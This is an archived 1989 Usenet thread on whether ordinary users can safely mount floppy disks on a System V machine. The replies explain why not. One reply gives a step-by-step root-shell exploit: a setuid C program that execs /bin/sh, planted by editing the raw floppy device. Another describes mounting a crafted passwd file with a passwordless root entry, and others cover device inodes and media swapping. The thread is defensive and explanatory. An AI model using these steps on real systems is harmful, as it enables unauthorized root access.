gulik@gagme.uucp (Gregory Gulik) (12/06/89)
Is it possible to set up a shell script that will
allow non-super-user people to mount a floppy file system?
I don't want to give users access to the root account,
but I want to allow them to mount a floppy.
I tried a script that contains the command to mount
the file system, and made that script setuid and setgid
to root.
Well, it doesn't work.
How should I be doing this?
By the way, this is a 3B2 running System V 3.2
-greg
--
Gregory A. Gulik
...!jolnet!gagme!greg || gagme!greg@jolnet.orpk.il.us
|| gulik@depaul.edu
merlyn@iwarp.intel.com (Randal Schwartz) (12/13/89)
In article <23@gagme.uucp>, gulik@gagme (Gregory Gulik) writes: | Is it possible to set up a shell script that will | allow non-super-user people to mount a floppy file system? Yes... but... | How should I be doing this? ... you shouldn't. Mounting a trashed filesystem will take your system down *real* fast. I suppose you could run fsck on your to-be-mounted floppy, and verify the exit status, but that sounds like a lot of work, because it doesn't avoid the second problem... described as so: (presume mountflop does an fsck followed by a mount, and umountflop does the reverse). $ newfs /dev/flop $ mountflop $ cd /flop $ cat >x.c main() { setuid(geteuid()); exec("/bin/sh","sh",0); } ^D $ cc x.c -o x $ cd / $ umountflop $ emacs /dev/flop [find inode table, turn on setuid bit on ./x] $ mountflop $ /flop/x # [a root shell] Sorry. It's too easy. (C code deliberately untested for security through obscurity.. :-) Just another UNIX hacker, -- /== Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095 ====\ | on contract to Intel's iWarp project, Hillsboro, Oregon, USA, Sol III | | merlyn@iwarp.intel.com ...!uunet!iwarp.intel.com!merlyn | \== Cute Quote: "Welcome to Oregon... Home of the California Raisins!" ==/
martin@mwtech.UUCP (Martin Weitzel) (12/14/89)
In article <5338@omepd.UUCP> merlyn@iwarp.intel.com (Randal Schwartz) writes: >In article <23@gagme.uucp>, gulik@gagme (Gregory Gulik) writes: >| Is it possible to set up a shell script that will >| allow non-super-user people to mount a floppy file system? > >Yes... but... [description of security hole deleted] Several security holes occur, if you allow to mount a floppy (more general: a file system on removable media) for everyone: 1) There may be root-suid/sgid files on the media, which allow intrusion into the system. (The files may be produced in advance on some other system, where the intruder has root privileges). As much as I know, this problem was cured in very recent UNIX releases by *not* obbeying the s-bits in file systems, which were not mounted by the super-user. 2) There may be i-nodes that point to device-files like /dev/mem or disk-partitions. This would enable any bad guy, also to intrude into the system. For the 'real unix hacker' everything is open then (even, if he/she is originally locked in a chroot-ed environment!!). I don't know, if this was fixed together with problem 1). 3) Because the mount-command was not designed to be run setuid to root, it doesn't make any checks if you have access-rights to the mount point. So you could carefully prepare a floppy with a file named 'passwd' containing the one line "a::0:0::/:" and mount it .... (guess where - and be sure also to include the unmount-command :-)) To cure these problems, I've written a collection of shell-scripts and c-programs, which look at a file system on removable media with the same accuracy as a system operator would (should) do, before mounting some floppy a user brings to him or her. The programs care for umounting too, so that a malicious user could not unmount some resource at will. If anyone out is interested, I'm willing to email the programs. I'll also consider to post them, if I receive sufficient requests within the next days. -- <<< MW -- email: see header -- voice: 49-(0)6151-6 56 83 >>>
chris@mimsy.umd.edu (Chris Torek) (12/22/89)
In article <541@mwtech.UUCP> martin@mwtech.UUCP (Martin Weitzel) writes: >Several security holes occur, if you allow to mount a floppy >(more general: a file system on removable media) for everyone: >1) There may be root-suid/sgid files on the media ... >2) There may be i-nodes that point to device-files like /dev/mem ... >3) ... the mount-command [does not check the mount point] There is a fourth problem, which cannot be solved in software: If the medium is removable, it can be removed after all the checking has occurred, but in time to put the bad thing out there, or to crash the system, etc. -- In-Real-Life: Chris Torek, Univ of MD Comp Sci Dept (+1 301 454 7163) Domain: chris@cs.umd.edu Path: uunet!mimsy!chris